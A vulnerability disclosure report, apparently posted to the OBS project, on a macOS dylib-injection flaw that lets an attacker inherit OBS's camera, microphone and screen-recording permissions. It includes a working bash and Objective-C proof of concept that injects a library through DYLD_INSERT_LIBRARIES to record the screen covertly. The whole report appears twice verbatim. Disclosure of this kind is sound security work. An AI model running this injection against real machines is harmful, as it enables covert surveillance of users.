Hi!
Please, find here my report of the fact that attackers could abuse the macOS OBS software to access resources such as the camera or microphone otherwise protected by TCC because OBS allows to load arbitrary libraries. As I couldn't find any other place to send this information privately I'm posting it here (if this is not the right place please let me know):
# Context
In macOS a process is considered a security boundary. This is why macOS implements several defense mechanisms that prevent even processes from the same user (or from root) to be able to inject code in a different process.
This is done because executables can have extra permissions via entitlements or can manage sensitive information inside of it.
However, it was found that the `OBS` macOS application is vulnerable to library injection.
# Library Injection
It was found that the `OBS` application has the entitlements `com.apple.security.cs.disable-library-validation` and `com.apple.security.cs.allow-dyld-environment-variables`.
Those entitlements basically disable the validation of libraries loaded by the application and allow a user to use the environment variable `DYLD_INSERT_LIBRARIES` to indicate any library inside the filesystem to be loaded. Effectively allowing to execute arbitrary code inside the `OBS` process.
For more information about Library Validation and Library Injection check https://book.hacktricks.xyz/macos-h...on/macos-proces-abuse/macos-library-injection
# Impact
The `OBS` application has some privileged entitlements:
- `com.apple.security.device.audio-input` - Grants access to the microphone
- `com.apple.security.device.camera` - Grants access to the camera
This means that an attacker could inject code in the `OBS` application and abuse those entitlements to access to the user's sensitive information.
Moreover, when started OBS will request access to `Accessibility` and `Screen Recording`. This means that an attacker could inject code in the `OBS` application and abuse those privileges.
Note that access to those resources might prompt a dialog to the user asking for permission. However, the user might not suspect that the application requesting access is `OBS` and grant the access. Or if the user already used `OBS` before, the user might have already granted access to those permissions to `OBS` and the dialog won't be prompted again.
Moreover, a malicious application could also abuse the code injection in the application to make `OBS` request acccess to other TCC protected resources like Desktop or Documents so the user doesn't suspect and then abuse the granted access through `OBS` to access those resources.
# Other CVEs
These other CVEs were assigned to apps with the same vulnerability:
- https://wojciechregula.blog/post/how-to-rob-a-firefox/
- https://github.com/Zeyad-Azima/CVE-2023-26818
# PoC
This PoC will compile and inject in OBS app a library that will record the screen in a 3s video. It writes some logs in `/tmp/logs.txt` to check that the code was executed. The recording will be stored in `/tmp/screen.mov`.
Note that even if this PoC is only to record the screen, it's possible to find other PoCs from https://book.hacktricks.xyz/macos-h...rity-protections/macos-tcc/macos-tcc-payloads to access the other resources like the microphone or the camera.
```bash
#!/bin/bash
rm -rf /tmp/screen.mov
pkill OBS
cat > /tmp/inject.m <<EOF
#import <Foundation/Foundation.h>
#import <AVFoundation/AVFoundation.h>
@Interface MyRecordingDelegate : NSObject <AVCaptureFileOutputRecordingDelegate>
@end
@implementation MyRecordingDelegate
- (void)captureOutput:(AVCaptureFileOutput *)output
didFinishRecordingToOutputFileAtURL:(NSURL *)outputFileURL
fromConnections:(NSArray *)connections
error:(NSError *)error {
if (error) {
NSLog(@"Recording error: %@", error);
} else {
NSLog(@"Recording finished successfully.");
}
exit(0);
}
@end
__attribute__((constructor))
void myconstructor(int argc, const char **argv){
freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt
AVCaptureSession *captureSession = [[AVCaptureSession alloc] init];
AVCaptureScreenInput *screenInput = [[AVCaptureScreenInput alloc] initWithDisplayID:CGMainDisplayID()];
if ([captureSession canAddInput:screenInput]) {
[captureSession addInput:screenInput];
}
AVCaptureMovieFileOutput *fileOutput = [[AVCaptureMovieFileOutput alloc] init];
if ([captureSession canAddOutput:fileOutput]) {
[captureSession addOutput:fileOutput];
}
[captureSession startRunning];
MyRecordingDelegate *delegate = [[MyRecordingDelegate alloc] init];
[fileOutput startRecordingToOutputFileURL:[NSURL fileURLWithPath:@"/tmp/screen.mov"] recordingDelegate:delegate];
// Run the loop for 5 seconds to capture
dispatch_after(dispatch_time(DISPATCH_TIME_NOW, (int64_t)(5 * NSEC_PER_SEC)), dispatch_get_main_queue(), ^{
[fileOutput stopRecording];
});
CFRunLoopRun();
freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt
}
EOF
gcc -dynamiclib -framework Foundation -framework AVFoundation -framework CoreVideo -framework CoreMedia -framework CoreGraphics -o /tmp/inject.dylib /tmp/inject.m
open --env "DYLD_INSERT_LIBRARIES=/tmp/inject.dylib" -a "OBS"
```
It could also trigger a keylogger
# Othe vulnerable binaries
The following `OBS` binaries are also vulnerable to the same issue:
- /Applications/OBS.app/Contents/MacOS/obs-ffmpeg-mux
# Disclaimer
This proposed vulnerability is part of a research that will be potentially presented in some cybersecurity conference(s).
Please, find here my report of the fact that attackers could abuse the macOS OBS software to access resources such as the camera or microphone otherwise protected by TCC because OBS allows to load arbitrary libraries. As I couldn't find any other place to send this information privately I'm posting it here (if this is not the right place please let me know):
# Context
In macOS a process is considered a security boundary. This is why macOS implements several defense mechanisms that prevent even processes from the same user (or from root) to be able to inject code in a different process.
This is done because executables can have extra permissions via entitlements or can manage sensitive information inside of it.
However, it was found that the `OBS` macOS application is vulnerable to library injection.
# Library Injection
It was found that the `OBS` application has the entitlements `com.apple.security.cs.disable-library-validation` and `com.apple.security.cs.allow-dyld-environment-variables`.
Those entitlements basically disable the validation of libraries loaded by the application and allow a user to use the environment variable `DYLD_INSERT_LIBRARIES` to indicate any library inside the filesystem to be loaded. Effectively allowing to execute arbitrary code inside the `OBS` process.
For more information about Library Validation and Library Injection check https://book.hacktricks.xyz/macos-h...on/macos-proces-abuse/macos-library-injection
# Impact
The `OBS` application has some privileged entitlements:
- `com.apple.security.device.audio-input` - Grants access to the microphone
- `com.apple.security.device.camera` - Grants access to the camera
This means that an attacker could inject code in the `OBS` application and abuse those entitlements to access to the user's sensitive information.
Moreover, when started OBS will request access to `Accessibility` and `Screen Recording`. This means that an attacker could inject code in the `OBS` application and abuse those privileges.
Note that access to those resources might prompt a dialog to the user asking for permission. However, the user might not suspect that the application requesting access is `OBS` and grant the access. Or if the user already used `OBS` before, the user might have already granted access to those permissions to `OBS` and the dialog won't be prompted again.
Moreover, a malicious application could also abuse the code injection in the application to make `OBS` request acccess to other TCC protected resources like Desktop or Documents so the user doesn't suspect and then abuse the granted access through `OBS` to access those resources.
# Other CVEs
These other CVEs were assigned to apps with the same vulnerability:
- https://wojciechregula.blog/post/how-to-rob-a-firefox/
- https://github.com/Zeyad-Azima/CVE-2023-26818
# PoC
This PoC will compile and inject in OBS app a library that will record the screen in a 3s video. It writes some logs in `/tmp/logs.txt` to check that the code was executed. The recording will be stored in `/tmp/screen.mov`.
Note that even if this PoC is only to record the screen, it's possible to find other PoCs from https://book.hacktricks.xyz/macos-h...rity-protections/macos-tcc/macos-tcc-payloads to access the other resources like the microphone or the camera.
```bash
#!/bin/bash
rm -rf /tmp/screen.mov
pkill OBS
cat > /tmp/inject.m <<EOF
#import <Foundation/Foundation.h>
#import <AVFoundation/AVFoundation.h>
@Interface MyRecordingDelegate : NSObject <AVCaptureFileOutputRecordingDelegate>
@end
@implementation MyRecordingDelegate
- (void)captureOutput:(AVCaptureFileOutput *)output
didFinishRecordingToOutputFileAtURL:(NSURL *)outputFileURL
fromConnections:(NSArray *)connections
error:(NSError *)error {
if (error) {
NSLog(@"Recording error: %@", error);
} else {
NSLog(@"Recording finished successfully.");
}
exit(0);
}
@end
__attribute__((constructor))
void myconstructor(int argc, const char **argv){
freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt
AVCaptureSession *captureSession = [[AVCaptureSession alloc] init];
AVCaptureScreenInput *screenInput = [[AVCaptureScreenInput alloc] initWithDisplayID:CGMainDisplayID()];
if ([captureSession canAddInput:screenInput]) {
[captureSession addInput:screenInput];
}
AVCaptureMovieFileOutput *fileOutput = [[AVCaptureMovieFileOutput alloc] init];
if ([captureSession canAddOutput:fileOutput]) {
[captureSession addOutput:fileOutput];
}
[captureSession startRunning];
MyRecordingDelegate *delegate = [[MyRecordingDelegate alloc] init];
[fileOutput startRecordingToOutputFileURL:[NSURL fileURLWithPath:@"/tmp/screen.mov"] recordingDelegate:delegate];
// Run the loop for 5 seconds to capture
dispatch_after(dispatch_time(DISPATCH_TIME_NOW, (int64_t)(5 * NSEC_PER_SEC)), dispatch_get_main_queue(), ^{
[fileOutput stopRecording];
});
CFRunLoopRun();
freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt
}
EOF
gcc -dynamiclib -framework Foundation -framework AVFoundation -framework CoreVideo -framework CoreMedia -framework CoreGraphics -o /tmp/inject.dylib /tmp/inject.m
open --env "DYLD_INSERT_LIBRARIES=/tmp/inject.dylib" -a "OBS"
```
It could also trigger a keylogger
# Othe vulnerable binaries
The following `OBS` binaries are also vulnerable to the same issue:
- /Applications/OBS.app/Contents/MacOS/obs-ffmpeg-mux
# Disclaimer
This proposed vulnerability is part of a research that will be potentially presented in some cybersecurity conference(s).